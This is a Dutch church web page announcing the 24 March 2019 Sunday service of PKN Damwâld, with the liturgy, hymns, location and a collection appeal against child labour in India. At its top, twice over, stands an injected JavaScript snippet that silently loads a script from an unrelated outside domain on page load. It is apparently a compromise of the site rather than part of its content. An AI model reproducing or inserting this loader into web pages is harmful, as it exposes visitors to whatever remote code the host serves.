;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 24 maart 2019 9:30 uur - PKN Damwâld
zondag 24 maart 2019
09:30 uur

Kerkdienst zondag 24 maart 2019 9:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Organist:Nienke van der Heide-Visser
Liturgie
Lied voor de dienst : Gez. 399 : 1, 4 en 6
Welkom
Intochtslied Elb 275 : 1 en 2
Stil gebed, Votum en groet
We zingen: Psalm 25 : 4 en 8
Wetslezing .
We zingen: Gez. 62 : 1, 2 en 3
We lezen: Marcus 10 : 46 - 52
We zingen: ps. 72 : 2 en 4
Preek .
We zingen: Elb 299 :1 en 3
Dankzegging en voorbede
Collecte
Slotlied Gez. 432 : 1 en 2
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Stop kinderarbeid in India

In de Indiase stad Nasapur is de IT-sector booming business. Helaas profiteert maar een handjevol mensen daarvan mee. Het overgrote deel van de bevolking verricht als dagloner voor een schamel loon zwaar werk in de landbouw of industrie. Door armoede gedwongen werken ook kinderen mee. Kinderarbeid moet stoppen, vindt Kerk in Actie. Daarom werken we samen met partnerorganisaties aan beter onderwijs. We lichten jaarlijks 5.000 ouders en kinderen vóór over het belang van onderwijs, bezoeken scholen om onderwijs advies te geven en begeleiden meer dan 700 werkende kinderen (terug) naar school. Geef in de collecte, zodat ook in 2019 honderden werkende kinderen een nieuw begin kunnen maken op school!

Tweede collecte: Kerk
Uitganscollecte: Kerk